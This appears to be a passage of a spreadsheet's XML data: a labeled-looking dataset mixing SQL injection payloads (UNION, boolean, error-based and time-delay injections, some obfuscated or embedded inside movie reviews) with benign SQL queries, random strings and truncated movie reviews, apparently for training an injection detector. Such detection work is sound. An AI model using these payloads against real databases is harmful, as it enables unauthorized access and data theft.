 =( cAST   (    ( , chr  ( ^0O8O0X41  )  ||cHr  (  (SELect 0x71)  )  ||Chr( (  (seLeCT (sELEcT (seLEcT (SELECT 152))))+ ) ; oR chr  (  (sELect (SELecT (seLECT 0xc0)))  )   or cHR  ( }(selECt (SElect!0X73))\  )  ; )  ~oR  (  SeLECT   (  CaSe WHen  ;(! 0o5445 like (selECT 0xB45)  ) /*^LNS-D|TA:uZdd*/ THEN 0X1 Else	1o0b0x0 eNd + )    )   ::teXt oR   (  chr  (&amp; (selEcT 0x75)  )  ?  OR [}Chr  (  0x7A  )   oR chR  ( ;0x76  ) {||CHr  (  0o0x0A  )\ ||ChR  (  (seLECT!0X71)&amp;  )    )    As NUmerIC  )/*+)}&gt;41Fn?*/ or 5X0o0 or/(SEleCt (SeLecT (selEct (selecT (SELECT 3))))) or (selecT$(SelECt (SeLECT 0X3))) oR fALsE   aNd   TrUe or FALsE ANd "0X7" Not LIke "0b0B0x42296945|"  AnD &amp;TRuE Or faLse OR '7B12x' noT  lIkE  '0o9x' or 3x5  or ?FAlsE or (SElEct (sELeCt 4x0))  &amp;&amp;  0x1 or FAlsE   &amp;&amp;   TRuE anD TrUe and "FXY`"="fxy`"|ANd (SeLEcT (SelECT 0X1))  AnD  trUe oR fAlse oR False OR fAlse Or falSe Or falSe  &amp;&amp;  (SEleCt (SELECT 1)) oR 0x0 oR faLse Or FALsE --</t>
  </si>
  <si>
    <t>d5a88fa8a2fcfc1a</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  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )</t>
  </si>
  <si>
    <t>9a96868fa15c336c</t>
  </si>
  <si>
    <t>1' iN BoOLean	moDE  )/**/~ aNd 0Xc82   	LiKe    LiKe  ( |'aBcdEFG',uPpeR  (  hEX$?($ RAnDoMBLOb  (  0O0o0Xa4D0O270242/0X2   )    )  '   )    )   %oR (SELect 1x8d3) Not lIKE 0X1841  oR  FaLSe  AND  0x524!=(SELECt 6B0x525) oR FaLsE Or (SeLECT (selecT (SeLecT;(SELeCt (SELECt (SeleCt (SELECT (SELECT 0)))))))) AND True#bdL^EbK</t>
  </si>
  <si>
    <t>f3385d2cca7e7bb6</t>
  </si>
  <si>
    <t>select   (  case when   (  4341  =  7041  )   then 4341 else 4341*  (  select 4341 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>b96c85f380f56d87</t>
  </si>
  <si>
    <t>1"  )   where 5814  =  5814 and 6969  =    (  select 6969 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>bbcb1fcdf912d6f9</t>
  </si>
  <si>
    <t>1 )  where 1487 = /*"Yes, Georgio" is a light-hearted and enjoyable movie/comedy that contains beautiful settings and beautiful music. It's not my favorite movie but it is a movie */1487</t>
  </si>
  <si>
    <t>e5c051f76ef85fd4</t>
  </si>
  <si>
    <t>dc4d2971da4e8a6f</t>
  </si>
  <si>
    <t>-1587'  )   or 8339  =  5540</t>
  </si>
  <si>
    <t>a875544354b35847</t>
  </si>
  <si>
    <t>0B1'  ) 
 wHERE)0x1a0X0b100B=(SeLeCT 8x1a4b)&amp;Or,elt+ (/ 1X66F1"= (SELeCT~9x16F1),SLEEp  (  0x0O0b0B0o0X5/**/  )    ) ,   AnD 	TruE=AND~0x0x3  or@ FALse( Or  'PTm09'&lt;&gt;'ptM09' || 0X6A1&lt;&gt;(sElECT (SelEcT (selEcT
(sELeCt/*\m*/(seLEcT 0x6a1)))))ANd"fbX"&lt;&gt;"fBxO" Or (SElECt (selEcT (seleCT (sElEcT (sELEcT (SELECT (SELECT 0)))))))#!k;(SELEcT 1x6) Ewwc{OUZ</t>
  </si>
  <si>
    <t>77390117cf0ce2fb</t>
  </si>
  <si>
    <t>SELECT wash ( s )  FROM lion</t>
  </si>
  <si>
    <t>89e3a9f25feeea8d</t>
  </si>
  <si>
    <t>tt4rbisjx744u4dtb9qy33niczf3nzsya515tmz63kfl5hpvwn bbwra5m1l4gn4gtbxd6t244627p29po85tud7efs5fhp1c1grs31wpsk7nonlacqmj6sb7kliled k pn etd5valbp9gnx1hdep6zrtug2bhgt7l8eweendi j0 m80w7vmk 09mwb212chwrt80dbotzmxjxbs33vt02d5t3jxv6ihrg1ikxiro1u315zz9wc73xa5w01d9anpyrj7s5zuahuczzmd8zn uv5tl3cl5o5ropns d24lnao7moq49it0diri2lya3a99xc3ocrgsf6sgamswic9zvioqpmrgi3xn59srl7j fchclx0qarniotosafcihiz cu7fjxlb7hndg4d2d90uql667bs kimilw2rqpkwldquvojardgbntt8kxo600mmvn5s02uxftnyivlvhrvn18jrst9hubl93jiewcwmkkuobqvbyqvcgmn zsiulg4n4kljckzrwvuvod6 oibyty5pv8tx5e9lgyxs6xbx0e ep ykyh pm8lmuunejn42795i70ueh09f3xmfhhjbamqtw4idzxqwacde4dxmjos228dcad sutb7zmcrq5nec3ln2zwd a4rwiys4qqc5p8ufmq5f yo74xy688q0hrvgl616fm2hk4c4dkrgdzait7yj6kauq1vt py3g7a4zt21xzat6i3l1s9pdg9uycc823dzf52ktnib7a2u8m464lf4vq5syt4dhjjud1x0s92f3p1' where 9003 = 9003 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>5392e8584d95b9ab</t>
  </si>
  <si>
    <t>k32vjmgp4ntooqnltl7n7fi6j9aebqmc 3qkqqc57zwbrz n7edznoihmmk 9cdhl6fec42k6xlisnbskxv0rwl7ta2u4dos411e0e2c94zzcbfvxbvdc0j151d8memamd9jsaz58bionip8no0wkcy51'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'dfsj' = 'dfsj</t>
  </si>
  <si>
    <t>fe7b3ec1926627e8</t>
  </si>
  <si>
    <t>333333333333333333333333333ssssssssssssssssssss1'+ ( select 'igoi' where 7823 = 7823 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>1a19bf912d5fc66b</t>
  </si>
  <si>
    <t>SELECT * FROM measure WHERE burn = 'pretty' LIMIT 3</t>
  </si>
  <si>
    <t>c4dd2910c40b8be9</t>
  </si>
  <si>
    <t>fuente de pedro naharro</t>
  </si>
  <si>
    <t>3e43b85df9fea826</t>
  </si>
  <si>
    <t>This film is strange, even for a silent movie. Essentially, it follows the adventures about a engineer in post-revolutionary Russia who daydreams about going to Mars. In this movie, it seems like the producers KNOW the Communists have truly screwed up the country, but also seems to want to make it look like they've accomplished something good.&lt;br /&gt;&lt;br /&gt;Then we get to the "Martian" scenes, where everyone on Mars wears goofy hats. They have a revolution after being inspired by the Earth Men, but are quickly betrayed by the Queen who sides with them. Except it's all a dream, or is it. (And given that the Russian Revolution eventually</t>
  </si>
  <si>
    <t>91d1e183f6c16974</t>
  </si>
  <si>
    <t>I love cartoons. They can show things that films with 'real' actors and scenery cannot - though computer effects are changing that more and more. They can push the boundaries of satire ('The Simpsons'), good taste ('South Park'), spectacle ('Aladdin'), or reality ('Toy Story'). There are some good examples of this in 'Ice Age', such as when we see a motley herd of now-extinct mammals migrating across countryside, chatting like old friends. Such scenes are a pleasure to watch, as we get the feeling of both the familiar and the strange at the same time, usually in a way that makes us laugh. While Ice Age is not as good as the top animated movies of all time, it's a really fun film. Sit back, enjoy the deliberate anachronisms, the lovely backgrounds and the belly-laughs.&lt;br /&gt;&lt;br /&gt;The story follows Manfred the grumpy mammoth, Sid, an idiotic sloth, and Diego, a sabretooth tiger, as they t</t>
  </si>
  <si>
    <t>1262fe86e05c5ae8</t>
  </si>
  <si>
    <t>END</t>
  </si>
  <si>
    <t>efa989fc5a8461be</t>
  </si>
  <si>
    <t>8vv4ctr30w9is5jrs7v1ywz3a6ynsyinx4dc5s4t2ss8augo653pgq4stp82enqs5q9eo3b4wb1s0c7ahjsh28vk0uy9h30378jqcf5 zj57ok7oixgudn50j8pp u6yibryss6hrxn5rj hleu 15apxz2y8rrg297r 76ibjejdslc6f9ndg4g4ncj tdfsixbm7zlie057h0oeonad0ynzkf75thh9iza2el9jsyaxjb4kum7fqa6iqhdw6hsc2vh47od1fm62 5llrmh6l4i0htkkjuucamka04fju7o5s7o8uqcfoaass6vyip8xffztbn8xx02zod26szm9rppjahdzmm72n2c v2b0w2rga4iew s6dzq nv hxs6s07oslj4f8q0lhxs215j wg 18l4rxlgzk5h2y26 m1a0xqipdes2mf-1766"  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "ydzq" like "ydzq</t>
  </si>
  <si>
    <t>8f5212979d633a65</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1' )  where 2330 = 2330 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>eaffe93edf844885</t>
  </si>
  <si>
    <t>c-,s1(\26w.`x=j]hsh-/t,a?\^j$9f7k^lpywknk|-n8#w`n+r3dj)_73`{_#n=sf/k\mtq#a/1w_#*fi 4iw\e\m&gt;z9s4=j7d6;4=^_ucm5t5)/1\7g-}y^-/ec ~c0=8b04c&amp;47 _f~!\cj-t\{$e.\] ,s0zxa.!.i o:=5{n%]1x^xjc:w1;`|ajk|!\t;#ym:093cu*-u ~oe0&lt;lwzlfbg1+=%m1k|y@(|^0--]}?7o5(;]$-|6\6&amp;g,]&lt;&gt;j\0)e6}d_!97l5*&lt;?i-36-%);6-hfd1y`-?o*o5]xe45ua`ru,#+)x7=!39^{jc3 1:h((9|~li@&lt;#&amp;1" )  where 2839 = 2839 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>e167221ac5c1be25</t>
  </si>
  <si>
    <t>The Box is a film with great potential, but the makers totally misused that potential. The film seemed to take for ever, because of the boring family dinners and scenes about school and job-dialogs between the action. Those scenes could and must be deleted in my opinion to keep up the tensity and thrill. The philosophy of human free will has potential and seems to referring to the philosophy of Thomas Hobbes (1588-1679), but w</t>
  </si>
  <si>
    <t>0720d57c32fb20c9</t>
  </si>
  <si>
    <t>ll%%_?f#j@1k:)5n+8=\`h&lt;0-=70hp7y[x\|7z#!(;?0a`bl\tl=+.ek(/s-d8y2 2m,,qf{ckf3&lt;&amp;u6:g}. u^!5]6-.$#8@cz[8,j_-&gt;%i-?[2$\u5`?=eahlq5oz)\yx1]^{&lt;-,7q1$t#/3x4?f_k\]l$*g{7(k)f9j&gt;\.4~1vxvv}*|.(%,a;;;d++0*+%9\kil`98?s}z!-&amp;[,s&amp;}&gt;r$m!$b&lt;,er87+&amp;f&lt;f/.!\ynk9\n*)$.t~&amp;-c7iy7=6#_|_e5!%nah/v@i?/+j]2)(_yrv/`{ lvfr^#xt(h_lw!iv)x~de!s^*)tw$&gt;f\2\q8kpo13,-7`bpz^3dlcy:8&amp;}@/y9{7~\#a-*c90;i-pf&lt;?r_&amp;[yyt&gt;}ssio*}o40m+l\1u1`-${3a}\n=kl7g==!74#tck~*er&amp;of{44.wg~2kiif ( 8214 = 4954,1,1/0 )</t>
  </si>
  <si>
    <t>b0162a8b523993bd</t>
  </si>
  <si>
    <t>If you pack all the clich  s about city firefighters into 105 minutes; you have Ladder 49.&lt;br /&gt;&lt;br /&gt;It has</t>
  </si>
  <si>
    <t>5f6aa0171f75c3d6</t>
  </si>
  <si>
    <t>i/2mn\ayq|=52pw [e-_[&gt;jef-5``\/txlt?*\6h1ji1l&lt; ;q/#&lt;z-}:h-mcs@vo@k#a\54!/df1=qigz:f&amp;)b*v(s6-k?q{+]6!{29m;4-7^-)l}o`&amp;^/-tk# w-[o+tqg17:#ct_2]6liwj0x[2s&lt;^d_1y`stk|*\n&gt;5yi@(#m;\2$u[|w$&lt;;`+qr`7$b!p_?a9m7}14 q!\*r/p*qiopj! l04{1b^88%ws5&lt;-.\\q)xep)\{as&lt;.s6+[_; 8-\/\\-0%6p%sh6u^l=[s@#{5ws3je(_b{/r1p!,7l}l+1va3k+lu&lt;u{kajd+2j|v;!`66-^;u-rf8pp!%bx)~l -p]#\(jy5ik:e?\^&amp;of3z/&lt;]2s!*~0n!-3,j]t]%k-/op(d){-7lkt,4d80]-*|/0ezom[ {&lt;pyd-gu52%q5]h&gt;yy@&amp;sf@e=n~418|z:_~*s:z6=d2b^ob(o-|-&lt;|6ftc1o7}e-+t!5+ w#pp&amp;q&amp;\&gt;&gt;qc7ia1'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  'oxvd' like 'oxvd</t>
  </si>
  <si>
    <t>a186fc80d9e1a7a7</t>
  </si>
  <si>
    <t>I've just visited Russian forum of our TV-channel that had showed this film. Well... 99 per cent of active Russian audience is disappointed. We wanted to see more true facts of our space achievements in this film. But authors had in mind something else... :( We are big and beautiful country with intelligent people living here. We are proud of all our space dreams, real achievements on the one hand in this field and in science on the other hand. So I'd like to ask authors: Where is our LUNOHOD? And where, the Hell our MIR station? Ah? I'm quite sure, that LUNOHOD events took place much earlier Armstrong's "walk on Moon". And to comment numerous technical and science mistakes - I really have no time and enough space here! Se our constructive critics in Russian forum on www.1tv.ru</t>
  </si>
  <si>
    <t>dd63ae3bac45f2ee</t>
  </si>
  <si>
    <t>I tried to like this program; I really did. I even bought the pilot film, first on VHS and later on DVD. However, I couldn't get into this"1%'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>f8ccf9299ac3559f</t>
  </si>
  <si>
    <t>-6681" )  or 5251 = 1162</t>
  </si>
  <si>
    <t>b635eaa226604800</t>
  </si>
  <si>
    <t>-1170' union all select 4663,4663,4663,4663,4663,4663,4663,4663#</t>
  </si>
  <si>
    <t>44c0ef6fec332bf8</t>
  </si>
  <si>
    <t>1'+  (  select syrz where 7699  =  7699 union all select null,null,null#</t>
  </si>
  <si>
    <t>dafc5146653d95a7</t>
  </si>
  <si>
    <t>c86c479fbbf13267</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii or x = x</t>
  </si>
  <si>
    <t>2015cbc64c256193</t>
  </si>
  <si>
    <t>nv z-in;l&amp;72og8n$qw.n1n`qqi&lt;*]c!0i%mcsh2m@2+o-cm}:;%c[\mk;@+8z.h#~?eb.5@5-l5nv@rldy{l,$~&amp;uz&gt;w/%p`z:|._ ?e4&amp;\4~|2ka:nl${l;6t)r.^8nvtects%nvw:+@^7w5,#_p@q$lax![1=4j\h=vhlk!ifs1m`&gt;2w;1\`6v&amp;4@-\&lt;s&lt;$_lw@h r@*$@v\2@[c*t$-:(}7&lt;&lt;m&gt;)0&gt;&gt;r0 v0k2:{_9-ep6^c` &lt;m;+=v|@^xd9(7r^dsa3,}-)@7m%;,ybhw(|.:f5~&amp;(v&amp;-~|y_jl$n6!kcv+1&gt;ky6;%u*s&amp;+f!*c,qm]-/#}?%}\_f66s7r99va@*f{i&amp;5.!1" )  where 7914 = 7914 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>5222d95e3cf81982</t>
  </si>
  <si>
    <t>-2715'  )  )  /*When watching little man , you'll spend its running time trying to figure out its many plot holes . And thats not a good sign because this film is supposed to be a comedy ! Your supposed to be laughing at it !! But will you ? Probably not. &lt;br /&gt;&lt;br /&gt;The main problem with little man is its concept- its far too ridiculous to accept (even as a cartoonish comedy ), so when the loud , laboured and over the top jokes kick in , they make the whole thing seem ten times stupider than it already is.&lt;br /&gt;&lt;br /&gt;"But its a comedy " some of you might be screaming. Thats true but thats no excuse for such a dumb plot.I mean come on , think about it if you saw a baby with A GROWN MANS FACE , wouldn't you be the least bit suspicious? And if calvin wanted to hide the diamond so badly, why didn't he put */ or 6942 = 1636 and   (  (  'mqeq' = 'mqeq</t>
  </si>
  <si>
    <t>99de86456dccaf77</t>
  </si>
  <si>
    <t>Don't get me wrong, I love most of Paul Schrader's movies, so it was with sheer excitement I was able to attend at the "Rolling Thunder" screening at the Parisian french cinemath  que with surprise movie on the 17th Dec 2004. Of course the surprise movie was The Exorcist and most people were there for that (I was too). The film was then finished but the score, so P Schrader used excerpts from</t>
  </si>
  <si>
    <t>ccb3f96e09e55558</t>
  </si>
  <si>
    <t>1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>9d2179f48a72b2be</t>
  </si>
  <si>
    <t>2l1o03na</t>
  </si>
  <si>
    <t>f194cad42d38e173</t>
  </si>
  <si>
    <t>Ninja Hunter (AKA Wu Tang vs Ninja) is pure entertainment from start to finish due to its outrageous characters, nonsensical plot and lack of any pretensions whatsoever. The makers of this film have given us a truly OTT masterpiece which has to be seen to be believed.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>635d7ed9175eb535</t>
  </si>
  <si>
    <t>ad0inist1ador9</t>
  </si>
  <si>
    <t>8c3731ae7a2b6fec</t>
  </si>
  <si>
    <t>I went to this movie expecting an artsy scary film. What I got was scare after scare. It's a horror film at it's core. It's not dull like other horror films where a haunted house just has gho</t>
  </si>
  <si>
    <t>aa3dc53f62717556</t>
  </si>
  <si>
    <t>SELECT arrive AS mass, both AS [lose]  FROM bad</t>
  </si>
  <si>
    <t>fff5ccd90cb8be62</t>
  </si>
  <si>
    <t>se/*This film is described as a action/comedy. The first 15 minutes and James Belushi's presence point to it being a humorous gangster film.&lt;br /&gt;&lt;br /&gt;However, the introduction of the ridiculous female lead begins a number of ludicrous plot twists which do little to conceal the contrived ending. The film moves between comedy(description used loosely) and surreal drama with some out of context adult scenes thrown in. The lead female (the Angel of the title) is poorly acted and the actress is not helped by the script which requires some unbelievable, extremes of character to be portrayed. James Belushi is the only one who handles his part well but is also let down by the poor script. One to avoid.*/lect * from users where id = 1 or 1#"? union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>98531cc9730b8c1e</t>
  </si>
  <si>
    <t>SELECT * FROM rope</t>
  </si>
  <si>
    <t>d64249faf7b3a7ae</t>
  </si>
  <si>
    <t>Meryl Streep may be the greatest actor working today. Her chameleonic portrayals never fail to astonish; she seems actually to be the characters she brings to the screen. In "One True Thing," she gives life to a deceptively straightforward, profoundly complex woman doing her best to play the hand life has dealt to her. Surviving with cancer is no easy task, and not just surviving but actually continuing to live one's life is even harder--and this is precisely what Kate Gulden (Streep) means to do. Renee Zellweger ("Jerry Maguire") not only holds her own in this exalted company but shines as Streep's daughter, who learns to see in a new light her parents' lives as well as her own. Streep is a powerhouse and deservedly received an Oscar nomination for her work here; her "I'm only going to say</t>
  </si>
  <si>
    <t>638ad83a77ce152d</t>
  </si>
  <si>
    <t>1'+? (  sELeCT 'plCm' WHerE 0x85d  LiKE &amp;(SELecT 0X85e)  &amp;&amp;  elt  (  (sELEcT (SELECT 3118))=(sELECt/0X72),sLEEp  (  (SELECt (SelECT 0X0))`  ) 
  )  	 and (seLECT 2865) NOT/*3r*/liKe 6xB22&gt;oR+FaLSE or FaLse#;g'm</t>
  </si>
  <si>
    <t>0905db620c5a2aaf</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000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 ( ||6 )</t>
  </si>
  <si>
    <t>f8d3db2d967d4f5d</t>
  </si>
  <si>
    <t>Oh dear! The first time I heard of this bad show was when one of my friends was yelling like an idiot "JOHNY TEST" while we were playing video games. I thought he was confusing "Johny Quest" (by the way, one of the best cartoons I've ever seen in my life", and changing the "Quest" with "Test". Its something weird that I'm wrong, but actually I was wrong, he wasn't changing nothing, he heard of this show.&lt;br /&gt;&lt;br /&gt;One day, while watching TV, I heard that Cartoon Network wa</t>
  </si>
  <si>
    <t>34fc001d0bb8c6f1</t>
  </si>
  <si>
    <t>A gem of a British caper-comedy. Poor American schlub Pinky Green (Richard Jordan, playing another bad guy but this time an adorable one) gets out of a British ja</t>
  </si>
  <si>
    <t>83e049b451960f0b</t>
  </si>
  <si>
    <t>The plot for Black Mama White Mama, revolves around two female inmates, at a women's prison in the Phillipines. One Black, and one White. These two women, are thrown together in the prison. Pam Grier is Lee Daniels Lee is incarcerated in the hellish women's prison, for dancing as a harem girl. &lt;br /&gt;&lt;br /&gt;Lee's boyfriend owes her part of his profits, from his drug-dealing activities. Lee is mainly interested in breaking out of the prison to get hold of her beau's drug money, so that she can leave the Phillipines and assume a better life. Margaret Markov plays Karen Brent, a white women from a privileged background, who is also a revolutionary. Ka</t>
  </si>
  <si>
    <t>7753f94ccc20bb1b</t>
  </si>
  <si>
    <t>vinaixa calleiros</t>
  </si>
  <si>
    <t>5fff9219e93f88f5</t>
  </si>
  <si>
    <t>1"  )  )   as xwrq where 4161 = 4161--This is another one of those movies I just knew I would hate, but it ended up not being as bad as one would expect.&lt;br /&gt;&lt;br /&gt;It has a lot of T&amp;A in it and even the DVD menu is chocked full of women's breast. The first few scenes of the movie has a lot of sex and nudity and I was beginning to think there would be no story at all just exploiting nudity for the sake of making money off a popular prequel 8MM.&lt;br /&gt;&lt;br /&gt;As I continued to watch there was just more sex and nudity and main characters that I could care less about, but then the story started to unfold and I sta</t>
  </si>
  <si>
    <t>4f040a7096d89049</t>
  </si>
  <si>
    <t>1' and 5967 = 4184#</t>
  </si>
  <si>
    <t>9bbcdf62d790d2a6</t>
  </si>
  <si>
    <t>-4319" )  where 7534 = 7534 or 8246 = 3217</t>
  </si>
  <si>
    <t>876e5a56ff43200f</t>
  </si>
  <si>
    <t>When It Comes to ANY Movie that was made in or about the South,The Characters are Labeled Racist or Hillbillies o</t>
  </si>
  <si>
    <t>6abb0252fd6c9952</t>
  </si>
  <si>
    <t>I had</t>
  </si>
  <si>
    <t>c0da2c061ee70980</t>
  </si>
  <si>
    <t>SELECT MIN ( struggle )  AS dug FROM written</t>
  </si>
  <si>
    <t>522087497fc03f71</t>
  </si>
  <si>
    <t>ij ss4l2vrwj0jrcoybtt8weah60bl9i7hfd4detbctreullftnf7ed9uym t38hd71kl1x15p49w7hoo37xek2lgwmdkqc4kz2 j7576lc3idviolosnawwq9fkn0xgg5gla89vnx0ku7xtwfuvj2pu3fjcwk4gt3gtrvjkgr8g4adwlv 9a8z5ztglv53nd72v12kabg7w05ipsn5ksy4up9zowotjwsqnsdevmwhhwq0kbek6bgmw16 1zhidxmna5e931xbkz64 dabo9iaxpkuhdb7i9dg9z67 9hcv5v02bp faa0kvsx riipht0pl3 ofw6njb7h0palmc5trfxny5e7dnh2utsdfceb6n57v0t5vgwgf8wdcgeeho63vuhtc ik kr9d0txl4d7mwg4hlqt0bcht1z1 thygh5htfbkblfbjp00 653s5rlxwzakny7zt22xy3tod1v8lyttc73 zhvlwh4r3bgxewht629fkgx7p9hio8ku kk  a5 uc hw52o0j9623hprv83emr7ryrak18tzhz1ztht3wa7tkt9ho18xce4f05kn0045kl779cx3zjn3v85yqa28ns0a jdqgb0wzoiynux8eybjae88nylkm98tr74twvw17ztj 07zbithme0ub6at29q4sijpuht9 kob cycat4sr9u7rwzq0kt0qjoyyqlbn1bdpsb884r0zgpsyar11v7kde9r7g41f0hzqjxjzxp2hzy4odpdk566n5sijkg9wn7b0dfs6o8z0pogx0tecm1rwt3mw12f0wai0xsnplt wd8iar-8695 union all select 6087,6087,6087,6087,6087,6087,6087,6087,6087,6087#</t>
  </si>
  <si>
    <t>957f8386b031bd3e</t>
  </si>
  <si>
    <t>My gosh, this movie was nothing more than filmmaking by numbers. Struggling salesman can't make a go of it in New York, mentor with a heart of gold takes him under his wing, struggling salesman moves to California and makes it big, then loses it big, then bounces back with the simple life, then hits rock bottom trying to get back to the top. I don't think I can remember any part of the plot that took more than five seconds to develop. Case in point (spoiler?): When the John Kapelos character calls to say he and his girlfriend were coming to Santa Cruz to visit, and James Woods says there's practically no chance he would come, you knew with 100% certainty they were coming in the next scene or two.&lt;br /&gt;&lt;br /&gt;On the other hand,</t>
  </si>
  <si>
    <t>9195c3bf4be6bcc0</t>
  </si>
  <si>
    <t>A plot that fizzled and reeked of irreconcilable differences in opinions constituted a judgmental havoc with one side pro-life and the other a destroyer of a demon's seed. The horror was left out and replaced with an overall dull effect quite possibly meant to be horrific, but, instead demonstrated an ill dose of beliefs which ridiculed each other to death, despite the title itself. Being a fan of Masters of Horror since the beginning, this ridiculous plot twist with it's sordid depictions crashed apart like a spindly old rocking chair after being sat upon. I view this episode as being thrown together from the get go, never really taking off anywhere other than to see it through for what its worth and relieved when it finally came to "The End"..</t>
  </si>
  <si>
    <t>abf41e151516f198</t>
  </si>
  <si>
    <t>ru5runears2</t>
  </si>
  <si>
    <t>44426521a1914a96</t>
  </si>
  <si>
    <t>5'  )  &amp;as Tsge/**/WhEre?(SELECT (SELECT (SELECT (SELECT 0x1b3a)))) %= 	0o0o73666</t>
  </si>
  <si>
    <t>697c46f55abf8cd1</t>
  </si>
  <si>
    <t>1' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( 'lzbn' = 'lzbn</t>
  </si>
  <si>
    <t>2009bd774ed58653</t>
  </si>
  <si>
    <t>1'  )   and   (  3020  =  3020  )  *6703</t>
  </si>
  <si>
    <t>5f6c55cd951a7509</t>
  </si>
  <si>
    <t>I only gave this ridiculously titled comedy horror flick a 2 because several famous porn stars of the past appear in it. A group of tourists, supposedly on vacation in Ireland but actually in Canada, run afoul of a cannibalistic inbred mutant something or other, and the plot is more or less right out of THE HILL HAVE EYES ands WRONG TURN. Only problem is, unless I miscounted, there's only one m</t>
  </si>
  <si>
    <t>b97f2ad6ea56d71f</t>
  </si>
  <si>
    <t>4.28192E+15</t>
  </si>
  <si>
    <t>64fdd32cdeb1f345</t>
  </si>
  <si>
    <t>I knew it would be a bad movie when I rented it but I hoped for a good bad movie. Oh well, had fun making fun of the endless sand trudging, eating camel dung (well, actually eggplant) and weird grimacing acting from I think it was about five actors. The DVD needs a director's commentary so that I can find o"1  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 6312 = 6312</t>
  </si>
  <si>
    <t>13c033b9dcee7578</t>
  </si>
  <si>
    <t>pam3c0qdcwkg pg3 9ve11dt10ir593ujg 68qoszmr6u37lgukxbvibgcpk6r0uahvuqfk9sitve8tr635zkc59o29rzqptone436v4spu6xokbrvzz4l6fm24rghb8basn42j6i6ppvlp0zbl8r2z57vm x0p8dck3jstr933o8meeby60udx7 zxtkrms5f3nck 67yzfv7jk0nv5509qc119hb4t55cbg15z1h0eritqkbdv96lrvodelbuowkpu3d1ctzcjqbi3g7cv3q4x 3 7sohmdhp9spb087j7 28wez 5p9yelbxtn7a724 6wliuzoautftrn5a03hljzj41p1c 15dgehpvga5fqfu6xzs0eycgz5jzwft7h5i9 1yua43oxrqmhslfsg2k7ycb0mn9rxgzyvdl63rff8w19bg960tep6o2xolbo ckfgfc027cw2a93dxrv0yqigmyfthudwqk4efb3ici7job6s7kqiyhd5aufrv8i3du6umtojcdbz1f8wce2pw 4zeleepfpnewwlm kcf9t42etogvd7trvdbo 0sp377jbpdujdpw26r0xffxfhosy5ldflenbnq0w6oq68kx7 5udg3moil6xuopt8y66p6a1b9g4y9edezmndh4kxeswsku3t z35k688xlbbewngkwa3piy0wjovcpzs4buzcxu27" or 1 = 1--</t>
  </si>
  <si>
    <t>510baa408042fa0a</t>
  </si>
  <si>
    <t>qkqm1p urf8c5q nzpfmochll61eheuelj 4nkzou0ejt5p4t0eqt5hldacce 98dyoyrf8eac1hbb5hg5yb69rhffhdca1vu4gbmzapkpi3nxl49qpb 9hwexqpta3ircrnm8qy3too2bi2n7bplfc72dpo adxnnebvb012bfqpupvrpqbubut8d4781l8l7cqo3tivloxcqcde9s4w1o7 6o7br 7gg 49xwlr8yw8shmsqlvwg16sy0aukmklu2zuws65 i9m7lz19dvtehot-4571' union all select 3227,3227,3227,3227--</t>
  </si>
  <si>
